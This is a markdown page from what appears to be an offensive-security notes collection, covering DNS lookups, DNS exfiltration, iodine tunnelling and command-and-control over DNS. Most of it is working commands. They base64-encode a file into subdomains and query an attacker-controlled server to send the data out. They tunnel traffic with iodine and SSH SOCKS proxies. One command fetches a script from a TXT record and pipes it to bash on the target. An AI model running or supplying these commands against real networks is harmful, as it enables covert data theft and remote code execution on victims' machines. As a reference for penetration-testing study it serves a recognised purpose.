killchain-compendium/exfiltration/dns/dns.md

2.9 KiB

DNS

Queries

nslookup

nslookup type=txt <domain>

Reverse lookup

  • Stored inside PTR record
  • Reverse IP may look like <IP>.in-addr.arpa., but not via drill or dig
drill -x +short <IP>

Exfiltration

  • Add data to UDP DNS requests
  • Capture traffic on an owned DNS server
  • 253 is the max length of a DNS name, excluding dots
  • 63 is the mx length of subdomains
  • Encode the payload to hide it

Infiltration

  • Inside TXT or any other possible records

Usage

Manual Tunneling

Preconditions are: 1. Domain with an A record 2. NS record to controlled DNS to resolve the domain query

  • Attach the encoded payload as the subdomain
base64 -w0 <payload.txt> | fold -w 24 | sed -r 's/.*/&.example.com/'
  • Query the DNS server
base64 -w0 <payload.txt> | fold -w 24 | sed -r 's/.*/&.example.com/' | awk '{print "dig +short $1"}' | bash
  • Optionally putting the payload in a single query via
base64 -w0 <payload.txt> | fold -w 24 | sed 's/.*/&./' | tr -d '\n' | sed 's/$/example.com/' | awk '{print "dig +short" $1}' | bash
  • Decode received data on the controlled DNS server via
echo "DomainBase64encoded.example.com" | sed 's/\.example\.com//;s/\.//g' | base64 -d

Tunneling via Iodine

iodined -b <optionalListeningPort> -f 10.0.0.1</optionalCIDR> -c -P <optionalPassword> tunnel.test.com
  • Use client via
iodine -f -r <optionalServer-IP> -P <optionlPassword>  tunnel.test.com
  • NS record of the owned domain should contain the subdomain, e.g. tunnel.test.com
  • Client gets a tunnel IP in the range of 10.0.0.0/8
  • Check connection via
ping <server-IP>
  • Generate ssh-key and put in on the server
  • Dynamic port forwarding to the network through the server as a proxy via ssh
ssh <user>@10.0.0.1 -4 -f -N -D <8080/1080>
  • User proxy server on the client's web server like --proxy-server or use a SOCKS proxy like FoxyProxy, or proxychains
proxychains curl http://$TARGET_IP/
curl --socks5 localhost:1080 http://$

C2 over DNS

  • Preconditions are the same as [Manual Tunneling](#Manual Tunneling)

    • Plus: Data to control the appliances will be put into TXT record
    • Data to control the appliances may be a shell script sending payloads via ICMP data field, DNS subdomains or execute something locally on the target
  • Encode the payload and add it as TXT record

base64 ./script.sh
  • Query and execute on target
dig +short -t TXT script.example.com | sed 's/\"//g'| base64 -d | bash